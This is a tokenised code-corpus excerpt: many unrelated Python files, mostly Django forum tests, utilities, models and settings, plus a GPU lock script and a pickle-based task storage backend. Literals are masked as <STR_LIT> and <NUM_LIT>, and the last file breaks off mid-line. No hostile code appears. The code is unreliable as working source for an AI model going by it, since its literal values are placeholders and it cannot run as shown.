'<STR_LIT>' ) <EOL> for script in glob ( '<STR_LIT>' ) : <EOL> print ( script ) <EOL> figure_basename = pjoin ( '<STR_LIT>' , os . path . splitext ( script ) [ <NUM_LIT:0> ] ) <EOL> with open ( script ) as f : <EOL> exec ( f . read ( ) ) <EOL> plt . close ( '<STR_LIT:all>' ) </s>
<s> from __future__ import unicode_literals <EOL> default_app_config = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> default_app_config = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . test import TestCase <EOL> from django . core . urlresolvers import reverse <EOL> from django . template import Template , Context <EOL> from django . core . cache import cache <EOL> from ... core . tests import utils <EOL> from . . models import Comment <EOL> from . models import CommentLike <EOL> from . forms import LikeForm <EOL> from . tags import render_like_form <EOL> class LikeViewTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> cache . clear ( ) <EOL> self . user = utils . create_user ( ) <EOL> self . category = utils . create_category ( ) <EOL> self . topic = utils . create_topic ( category = self . category , user = self . user ) <EOL> self . comment = utils . create_comment ( topic = self . topic ) <EOL> def test_like_create ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . comment . pk , } ) , <EOL> form_data ) <EOL> self . assertRedirects ( response , self . comment . get_absolute_url ( ) , status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> self . assertEqual ( len ( CommentLike . objects . all ( ) ) , <NUM_LIT:1> ) <EOL> def test_like_create_next ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> form_data = { '<STR_LIT>' : '<STR_LIT>' , } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . comment . pk , } ) , <EOL> form_data ) <EOL> self . assertRedirects ( response , '<STR_LIT>' , status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> def test_like_create_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> utils . login ( self ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . comment . pk , } ) , <EOL> form_data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_like_create_comment_increase_likes_count ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . comment . pk , } ) , <EOL> form_data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( Comment . objects . get ( pk = self . comment . pk ) . likes_count , <NUM_LIT:1> ) <EOL> def test_like_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> like = CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : like . pk , } ) , <EOL> form_data ) <EOL> self . assertRedirects ( response , self . comment . get_absolute_url ( ) , status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> self . assertEqual ( len ( CommentLike . objects . all ( ) ) , <NUM_LIT:0> ) <EOL> def test_like_delete_next ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> like = CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> form_data = { '<STR_LIT>' : '<STR_LIT>' , } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : like . pk , } ) , <EOL> form_data ) <EOL> self . assertRedirects ( response , '<STR_LIT>' , status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> def test_like_delete_comment_decrease_likes_count ( self ) : <EOL> """<STR_LIT>""" <EOL> utils . login ( self ) <EOL> comment = utils . create_comment ( topic = self . topic , likes_count = <NUM_LIT:1> ) <EOL> like = CommentLike . objects . create ( user = self . user , comment = comment ) <EOL> form_data = { } <EOL> response = self . client . post ( reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : like . pk , } ) , <EOL> form_data ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( Comment . objects . get ( pk = comment . pk ) . likes_count , <NUM_LIT:0> ) <EOL> class LikeFormTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> cache . clear ( ) <EOL> self . user = utils . create_user ( ) <EOL> self . category = utils . create_category ( ) <EOL> self . topic = utils . create_topic ( category = self . category , user = self . user ) <EOL> self . comment = utils . create_comment ( user = self . user , topic = self . topic ) <EOL> def test_like_create ( self ) : <EOL> """<STR_LIT>""" <EOL> form_data = { } <EOL> form = LikeForm ( data = form_data ) <EOL> form . comment = self . comment <EOL> form . user = self . user <EOL> self . assertEqual ( form . is_valid ( ) , True ) <EOL> def test_like_create_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> form_data = { } <EOL> form = LikeForm ( data = form_data ) <EOL> form . comment = self . comment <EOL> form . user = self . user <EOL> self . assertEqual ( form . is_valid ( ) , False ) <EOL> class LikeTemplateTagsTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> cache . clear ( ) <EOL> self . user = utils . create_user ( ) <EOL> self . category = utils . create_category ( ) <EOL> self . topic = utils . create_topic ( category = self . category , user = self . user ) <EOL> self . comment = utils . create_comment ( topic = self . topic ) <EOL> def test_like_render_like_form ( self ) : <EOL> """<STR_LIT>""" <EOL> template = Template ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> data = { '<STR_LIT>' : self . comment , '<STR_LIT>' : None } <EOL> template . render ( Context ( data ) ) <EOL> context = render_like_form ( ** data ) <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , None ) <EOL> self . assertIsInstance ( context [ '<STR_LIT>' ] , LikeForm ) <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , self . comment . pk ) <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , None ) <EOL> like = CommentLike . objects . create ( user = self . user , comment = self . comment ) <EOL> data [ '<STR_LIT>' ] = like <EOL> template . render ( Context ( data ) ) <EOL> context = render_like_form ( ** data ) <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , like ) </s>
<s> from __future__ import unicode_literals <EOL> from django . core . management . base import BaseCommand <EOL> from django . core . management import call_command <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> call_command ( '<STR_LIT>' , stdout = self . stdout , stderr = self . stderr ) <EOL> call_command ( '<STR_LIT>' , stdout = self . stdout , stderr = self . stderr ) <EOL> call_command ( '<STR_LIT>' , stdout = self . stdout , stderr = self . stderr , verbosity = <NUM_LIT:0> ) <EOL> self . stdout . write ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> import os <EOL> import json <EOL> import hashlib <EOL> from contextlib import contextmanager <EOL> from django . template . loader import render_to_string <EOL> from django . http import HttpResponse <EOL> def render_form_errors ( form ) : <EOL> return render_to_string ( '<STR_LIT>' , { '<STR_LIT>' : form , } ) <EOL> def json_response ( data = None , status = <NUM_LIT:200> ) : <EOL> data = data or { } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = '<STR_LIT:application/json>' , status = status ) <EOL> def mkdir_p ( path ) : <EOL> try : <EOL> os . makedirs ( path ) <EOL> except OSError : <EOL> if not os . path . isdir ( path ) : <EOL> raise <EOL> def get_hash ( file ) : <EOL> md5 = hashlib . md5 ( ) <EOL> for c in file . chunks ( ) : <EOL> md5 . update ( c ) <EOL> return md5 . hexdigest ( ) <EOL> @ contextmanager <EOL> def pushd ( new_dir ) : <EOL> """<STR_LIT>""" <EOL> prev_dir = os . getcwd ( ) <EOL> os . chdir ( new_dir ) <EOL> yield <EOL> os . chdir ( prev_dir ) <EOL> def get_query_string ( request , ** params ) : <EOL> """<STR_LIT>""" <EOL> query_dict = request . GET . copy ( ) <EOL> for k , v in sorted ( params . items ( ) ) : <EOL> query_dict [ k ] = v <EOL> return query_dict . urlencode ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . conf . urls import url <EOL> from django . contrib . auth . decorators import login_required <EOL> from . forms import AdvancedSearchForm <EOL> from . import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , login_required ( views . SearchView ( <EOL> template = '<STR_LIT>' , <EOL> form_class = AdvancedSearchForm ) <EOL> ) , name = '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> default_app_config = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils import timezone <EOL> from . managers import TopicPrivateQuerySet <EOL> class TopicPrivate ( models . Model ) : <EOL> user = models . ForeignKey ( settings . AUTH_USER_MODEL , related_name = '<STR_LIT>' ) <EOL> topic = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> date = models . DateTimeField ( default = timezone . now ) <EOL> objects = TopicPrivateQuerySet . as_manager ( ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> ordering = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> def get_absolute_url ( self ) : <EOL> return self . topic . get_absolute_url ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . apps import AppConfig <EOL> class SpiritUserAuthConfig ( AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = "<STR_LIT>" <EOL> label = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> from django . test import TestCase <EOL> from django . dispatch import Signal <EOL> from hooks . signalhook import hook <EOL> class MockSignal : <EOL> def __init__ ( self , providing_args = None ) : <EOL> self . providing_args = providing_args <EOL> def connect ( self , func , sender = None , dispatch_uid = None ) : <EOL> self . func = func <EOL> self . sender = sender <EOL> self . dispatch_uid = dispatch_uid <EOL> def disconnect ( self , func , dispatch_uid = None ) : <EOL> self . func = func <EOL> self . dispatch_uid = dispatch_uid <EOL> def send ( self , sender = None , ** kwargs ) : <EOL> self . sender = sender <EOL> self . kwargs = kwargs <EOL> class FakeHook : <EOL> """<STR_LIT>""" <EOL> class SignalHookTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> hook . _registry . clear ( ) <EOL> def test_connect ( self ) : <EOL> def func ( ) : <EOL> pass <EOL> mocksignal = MockSignal ( ) <EOL> hook . _registry [ "<STR_LIT>" ] = mocksignal <EOL> hook . connect ( "<STR_LIT>" , func , sender = FakeHook , dispatch_uid = "<STR_LIT:foo>" ) <EOL> self . assertEqual ( [ mocksignal . func , mocksignal . sender , mocksignal . dispatch_uid ] , <EOL> [ func , FakeHook , "<STR_LIT:foo>" ] ) <EOL> def test_disconnect ( self ) : <EOL> def func ( ) : <EOL> pass <EOL> mocksignal = MockSignal ( ) <EOL> hook . _registry [ "<STR_LIT>" ] = mocksignal <EOL> hook . disconnect ( "<STR_LIT>" , func , dispatch_uid = "<STR_LIT:foo>" ) <EOL> self . assertEqual ( [ mocksignal . func , mocksignal . dispatch_uid ] , <EOL> [ func , "<STR_LIT:foo>" ] ) <EOL> def test_send ( self ) : <EOL> mocksignal = MockSignal ( ) <EOL> hook . _registry [ "<STR_LIT>" ] = mocksignal <EOL> hook . send ( "<STR_LIT>" , sender = FakeHook , extra = "<STR_LIT>" ) <EOL> self . assertEqual ( [ mocksignal . sender , mocksignal . kwargs ] , <EOL> [ FakeHook , { '<STR_LIT>' : "<STR_LIT>" , } ] ) <EOL> def test_connect_and_send ( self ) : <EOL> """<STR_LIT>""" <EOL> def func_a ( signal , sender , ** kwargs ) : <EOL> self . _kwargs_a = kwargs <EOL> def func_b ( signal , sender , extra , ** kwargs ) : <EOL> self . _extra_b = extra <EOL> def func_c ( sender , extra , ** kwargs ) : <EOL> self . _extra_c = extra <EOL> def func_d ( extra , ** kwargs ) : <EOL> self . _extra_d = extra <EOL> hook . connect ( "<STR_LIT>" , func_a , sender = FakeHook ) <EOL> hook . connect ( "<STR_LIT>" , func_b , sender = FakeHook ) <EOL> hook . connect ( "<STR_LIT>" , func_c , sender = FakeHook ) <EOL> hook . connect ( "<STR_LIT>" , func_d , sender = FakeHook ) <EOL> hook . send ( "<STR_LIT>" , sender = FakeHook , extra = "<STR_LIT>" ) <EOL> self . assertDictEqual ( self . _kwargs_a , { '<STR_LIT>' : "<STR_LIT>" , } ) <EOL> self . assertEqual ( self . _extra_b , "<STR_LIT>" ) <EOL> self . assertEqual ( self . _extra_c , "<STR_LIT>" ) <EOL> self . assertEqual ( self . _extra_d , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import os . path <EOL> from xml . dom import Node <EOL> from xml . dom . minidom import parseString <EOL> from subprocess import Popen , PIPE , STDOUT <EOL> _dev_prefix = '<STR_LIT>' <EOL> def board_ids ( ) : <EOL> """<STR_LIT>""" <EOL> p = Popen ( [ '<STR_LIT>' ] , stdout = PIPE ) <EOL> nBoards = int ( p . stdout . read ( ) ) <EOL> return range ( nBoards ) <EOL> def _lock_file ( id ) : <EOL> """<STR_LIT>""" <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' % id <EOL> else : <EOL> return '<STR_LIT>' % id <EOL> def owner_of_lock ( id ) : <EOL> """<STR_LIT>""" <EOL> import pwd <EOL> try : <EOL> statinfo = os . lstat ( _lock_file ( id ) ) <EOL> return pwd . getpwuid ( statinfo . st_uid ) . pw_name <EOL> except : <EOL> return "<STR_LIT>" <EOL> def _obtain_lock ( id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> os . symlink ( '<STR_LIT>' , _lock_file ( id ) ) <EOL> return True <EOL> except : <EOL> return False <EOL> def _launch_reaper ( id , pid ) : <EOL> """<STR_LIT>""" <EOL> from subprocess import Popen , PIPE <EOL> me = __file__ <EOL> if me . endswith ( '<STR_LIT>' ) : <EOL> me = me [ : - <NUM_LIT:1> ] <EOL> myloc = os . path . dirname ( me ) <EOL> if not myloc : <EOL> myloc = os . getcwd ( ) <EOL> reaper_cmd = os . path . join ( myloc , '<STR_LIT>' ) <EOL> Popen ( [ reaper_cmd , str ( pid ) , me , '<STR_LIT>' , str ( id ) ] , <EOL> stdout = open ( '<STR_LIT>' , '<STR_LIT:w>' ) ) <EOL> def obtain_lock_id ( pid = None ) : <EOL> """<STR_LIT>""" <EOL> id = - <NUM_LIT:1> <EOL> id = obtain_lock_id_to_hog ( ) <EOL> try : <EOL> if id >= <NUM_LIT:0> : <EOL> if pid is None : <EOL> pid = os . getpid ( ) <EOL> _launch_reaper ( id , pid ) <EOL> except : <EOL> free_lock ( id ) <EOL> id = - <NUM_LIT:1> <EOL> return id <EOL> def obtain_lock_id_to_hog ( ) : <EOL> """<STR_LIT>""" <EOL> for id in board_ids ( ) : <EOL> if _obtain_lock ( id ) : <EOL> return id <EOL> return - <NUM_LIT:1> <EOL> def free_lock ( id ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> filename = _lock_file ( id ) <EOL> os . rename ( filename , filename + '<STR_LIT>' ) <EOL> os . remove ( filename + '<STR_LIT>' ) <EOL> return True <EOL> except : <EOL> return False <EOL> def nvidia_gpu_stats ( ) : <EOL> p = Popen ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , stdout = PIPE ) <EOL> output = p . stdout . read ( ) . lstrip ( ) <EOL> try : <EOL> doc = parseString ( output ) <EOL> gpucounter = <NUM_LIT:0> <EOL> templist = [ ] <EOL> memlist = [ ] <EOL> uselist = [ ] <EOL> fanlist = [ ] <EOL> doc2 = doc . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> gpulist = doc2 . getElementsByTagName ( "<STR_LIT>" ) <EOL> for gpu in gpulist : <EOL> temp = gpu . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> temp2 = temp . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> templist . append ( str ( temp2 . firstChild . toxml ( ) ) ) <EOL> mem = gpu . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> memtot = mem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> memused = mem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> memfree = mem . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> memtot_str = str ( memtot . firstChild . toxml ( ) ) <EOL> memused_str = str ( memused . firstChild . toxml ( ) ) <EOL> memfree_str = str ( memfree . firstChild . toxml ( ) ) <EOL> memtot_float = float ( memtot_str [ : - <NUM_LIT:3> ] ) <EOL> memused_float = float ( memused_str [ : - <NUM_LIT:3> ] ) <EOL> memfree_float = float ( memfree_str [ : - <NUM_LIT:3> ] ) <EOL> memlist . append ( '<STR_LIT>' % memused_float + '<STR_LIT>' % memfree_float + '<STR_LIT>' % memtot_float + '<STR_LIT>' ) <EOL> use = gpu . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> uselist . append ( str ( use . firstChild . toxml ( ) ) ) <EOL> fan = gpu . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> fanlist . append ( str ( fan . firstChild . toxml ( ) ) ) <EOL> gpucounter += <NUM_LIT:1> <EOL> return [ uselist , memlist , fanlist , templist ] <EOL> except : <EOL> return [ [ - <NUM_LIT> ] * len ( board_ids ( ) ) ] * <NUM_LIT:4> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> div = '<STR_LIT:U+0020>' + "<STR_LIT:->" * <NUM_LIT> <EOL> import sys <EOL> me = sys . argv [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in sys . argv : <EOL> if len ( sys . argv ) > <NUM_LIT:2> : <EOL> try : <EOL> pid = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> assert ( os . path . exists ( '<STR_LIT>' % pid ) ) <EOL> except : <EOL> print '<STR_LIT>' % me <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> pid = os . getppid ( ) <EOL> print obtain_lock_id ( pid ) <EOL> elif '<STR_LIT>' in sys . argv : <EOL> try : <EOL> id = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> except : <EOL> print '<STR_LIT>' % me <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if _obtain_lock ( id ) : <EOL> print id <EOL> else : <EOL> print - <NUM_LIT:1> <EOL> elif '<STR_LIT>' in sys . argv : <EOL> print obtain_lock_id_to_hog ( ) <EOL> elif '<STR_LIT>' in sys . argv : <EOL> try : <EOL> id = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> except : <EOL> print '<STR_LIT>' % me <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if free_lock ( id ) : <EOL> print "<STR_LIT>" <EOL> else : <EOL> owner = owner_of_lock ( id ) <EOL> if owner : <EOL> print "<STR_LIT>" % ( id , owner ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> elif '<STR_LIT>' in sys . argv : <EOL> stats = nvidia_gpu_stats ( ) <EOL> print div <EOL> print "<STR_LIT>" % '<STR_LIT:abc>' <EOL> print div <EOL> for id in board_ids ( ) : <EOL> print "<STR_LIT>" % ( id , stats [ <NUM_LIT:0> ] [ id ] , stats [ <NUM_LIT:1> ] [ id ] , stats [ <NUM_LIT:2> ] [ id ] , owner_of_lock ( id ) ) <EOL> print div + '<STR_LIT:\n>' <EOL> else : <EOL> stats = nvidia_gpu_stats ( ) <EOL> print div <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % me <EOL> print '<STR_LIT>' <EOL> print <EOL> print "<STR_LIT>" % me <EOL> print "<STR_LIT>" % me <EOL> print <EOL> print "<STR_LIT>" % me <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT:\n>' + div <EOL> print "<STR_LIT>" <EOL> print div <EOL> for id in board_ids ( ) : <EOL> print "<STR_LIT>" % ( id , stats [ <NUM_LIT:0> ] [ id ] , stats [ <NUM_LIT:1> ] [ id ] , stats [ <NUM_LIT:2> ] [ id ] , stats [ <NUM_LIT:3> ] [ id ] , owner_of_lock ( id ) ) <EOL> print div + '<STR_LIT:\n>' </s>
<s> from deepnet import deepnet_pb2 <EOL> import matplotlib . pyplot as plt <EOL> import glob , sys , gzip , numpy as np <EOL> def preds ( metrics_list ) : <EOL> y = [ ] <EOL> for metric in metrics_list : <EOL> count = metric . count <EOL> y . append ( <NUM_LIT:100> * ( <NUM_LIT:1> - metric . correct_preds / metric . count ) ) <EOL> return y <EOL> def get_plot ( v , skip , label ) : <EOL> y = v [ skip : ] <EOL> x = np . arange ( skip , len ( v ) ) <EOL> return plt . plot ( x , y , label = label ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> plt . ion ( ) <EOL> proto = sys . argv [ <NUM_LIT:1> ] <EOL> proto = glob . glob ( proto + "<STR_LIT:*>" ) [ - <NUM_LIT:1> ] <EOL> print proto <EOL> skip = <NUM_LIT:0> <EOL> if len ( sys . argv ) > <NUM_LIT:2> : <EOL> skip = int ( sys . argv [ <NUM_LIT:2> ] ) <EOL> model_pb = deepnet_pb2 . Model ( ) <EOL> f = gzip . open ( proto , '<STR_LIT:rb>' ) <EOL> model_pb . ParseFromString ( f . read ( ) ) <EOL> f . close ( ) <EOL> train = preds ( model_pb . train_stats ) <EOL> valid = preds ( model_pb . validation_stats ) <EOL> test = preds ( model_pb . test_stats ) <EOL> x = np . arange ( len ( train ) ) <EOL> plt . figure ( <NUM_LIT:1> ) <EOL> p1 = get_plot ( train , skip , '<STR_LIT:train>' ) <EOL> p2 = get_plot ( valid , skip , '<STR_LIT>' ) <EOL> p3 = get_plot ( test , skip , '<STR_LIT:test>' ) <EOL> plt . legend ( ) <EOL> plt . xlabel ( '<STR_LIT>' ) <EOL> plt . ylabel ( '<STR_LIT>' ) <EOL> plt . draw ( ) <EOL> raw_input ( '<STR_LIT>' ) </s>
<s> import re , sys <EOL> def main ( argv ) : <EOL> for line in sys . stdin : <EOL> piece , from_location , to_location , surround = line . split ( "<STR_LIT:\t>" ) <EOL> fields = line . strip ( ) . split ( "<STR_LIT:\t>" ) <EOL> if len ( fields ) == <NUM_LIT:4> : <EOL> piece , from_location , to_location , surround = fields <EOL> elif len ( fields ) == <NUM_LIT:3> : <EOL> piece , from_location , to_location = fields <EOL> else : <EOL> continue <EOL> from_location = from_location . split ( "<STR_LIT:U+002C>" ) <EOL> to_location = to_location . split ( "<STR_LIT:U+002C>" ) <EOL> if len ( fields ) == <NUM_LIT:4> : <EOL> print "<STR_LIT>" % ( piece , int ( to_location [ <NUM_LIT:0> ] ) - int ( from_location [ <NUM_LIT:0> ] ) , <EOL> int ( to_location [ <NUM_LIT:1> ] ) - int ( from_location [ <NUM_LIT:1> ] ) , surround ) <EOL> else : <EOL> print "<STR_LIT>" % ( piece , int ( to_location [ <NUM_LIT:0> ] ) - int ( from_location [ <NUM_LIT:0> ] ) , <EOL> int ( to_location [ <NUM_LIT:1> ] ) - int ( from_location [ <NUM_LIT:1> ] ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . stderr . write ( "<STR_LIT>" % sys . argv ) <EOL> main ( sys . argv ) </s>
<s> from django . db import transaction <EOL> from greenqueue . models import TaskResult <EOL> from greenqueue . exceptions import ResultDoesNotExist <EOL> from . base import BaseStorageBackend <EOL> from ... import settings <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> import base64 <EOL> class StorageBackend ( BaseStorageBackend ) : <EOL> def get ( self , uuid , default = None ) : <EOL> try : <EOL> result_obj = TaskResult . objects . get ( uuid = uuid ) <EOL> except TaskResult . DoesNotExist : <EOL> if default is None : <EOL> raise ResultDoesNotExist ( ) <EOL> return default <EOL> _val = base64 . b64decode ( result_obj . result ) <EOL> return pickle . loads ( _val ) <EOL> @ transaction . commit_on_success <EOL> def save ( self , uuid , value ) : <EOL> if settings . GREENQUEUE_IGNORE_RESULT : <EOL> return <EOL> _val = pickle . dumps ( value ) <EOL> tr = TaskResult . objects . create ( uuid = uuid , result = base64 . b64encode ( _val ) ) <EOL> return value </s>
<s> import functools <EOL> from importlib import import_module <EOL> import django <EOL> from django . utils . safestring import mark_safe <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> DJANGO_18 = ( django . VERSION [ : <NUM_LIT:2> ] == ( <NUM_LIT:1> , <NUM_LIT:8> ) ) <EOL> def load_class ( path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> mod_name , klass_name = path . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> mod = import_module ( mod_name ) <EOL> except AttributeError as e : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' . format ( mod_name , e ) ) <EOL> try : <EOL> klass = getattr ( mod , klass_name ) <EOL> except AttributeError : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' . format ( mod_name , klass_name ) ) <EOL> return klass <EOL> def safe ( function ) : <EOL> @ functools . wraps ( function ) <EOL> def _decorator ( * args , ** kwargs ) : <EOL> return mark_safe ( function ( * args , ** kwargs ) ) <EOL> return _decorator </s>
<s> from . base import BaseCompressor <EOL> class IdentityCompressor ( BaseCompressor ) : <EOL> def compress ( self , value ) : <EOL> return value <EOL> def decompress ( self , value ) : <EOL> return value </s>
<s> DATABASES = { <EOL> "<STR_LIT:default>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> } <EOL> SECRET_KEY = "<STR_LIT>" <EOL> TIME_ZONE = "<STR_LIT>" <EOL> LANGUAGE_CODE = "<STR_LIT>" <EOL> ADMIN_MEDIA_PREFIX = "<STR_LIT>" <EOL> STATICFILES_DIRS = ( ) <EOL> MIDDLEWARE_CLASSES = [ ] <EOL> CACHES = { <EOL> "<STR_LIT:default>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> } <EOL> INSTALLED_APPS = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from collections import Iterable <EOL> import json <EOL> import django <EOL> from django import forms <EOL> from django . core . exceptions import ValidationError <EOL> from django . core . serializers . json import DjangoJSONEncoder <EOL> from django . core import validators <EOL> from django . db import models <EOL> from django . utils import six <EOL> from django . utils . encoding import force_text <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> TYPES = { <EOL> "<STR_LIT:int>" : int , <EOL> "<STR_LIT>" : int , <EOL> "<STR_LIT>" : int , <EOL> "<STR_LIT:text>" : force_text , <EOL> "<STR_LIT>" : float , <EOL> "<STR_LIT>" : force_text , <EOL> } <EOL> def _cast_to_unicode ( data ) : <EOL> if isinstance ( data , ( list , tuple ) ) : <EOL> return [ _cast_to_unicode ( x ) for x in data ] <EOL> elif isinstance ( data , str ) : <EOL> return force_text ( data ) <EOL> return data <EOL> def _cast_to_type ( data , type_cast ) : <EOL> if isinstance ( data , ( list , tuple ) ) : <EOL> return [ _cast_to_type ( x , type_cast ) for x in data ] <EOL> if type_cast == str : <EOL> return force_text ( data ) <EOL> return type_cast ( data ) <EOL> def _unserialize ( value ) : <EOL> if not isinstance ( value , six . string_types ) : <EOL> return _cast_to_unicode ( value ) <EOL> try : <EOL> return _cast_to_unicode ( json . loads ( value ) ) <EOL> except ValueError : <EOL> return _cast_to_unicode ( value ) <EOL> class ArrayField ( six . with_metaclass ( models . SubfieldBase , models . Field ) ) : <EOL> empty_strings_allowed = False <EOL> def __init__ ( self , dbtype = "<STR_LIT:int>" , type_cast = None , dimension = <NUM_LIT:1> , * args , ** kwargs ) : <EOL> self . _array_type = dbtype <EOL> type_key = self . _array_type . split ( "<STR_LIT:(>" ) [ <NUM_LIT:0> ] <EOL> self . _explicit_type_cast = False <EOL> if type_cast is not None : <EOL> self . _type_cast = type_cast <EOL> self . _explicit_type_cast = True <EOL> elif type_key in TYPES : <EOL> self . _type_cast = 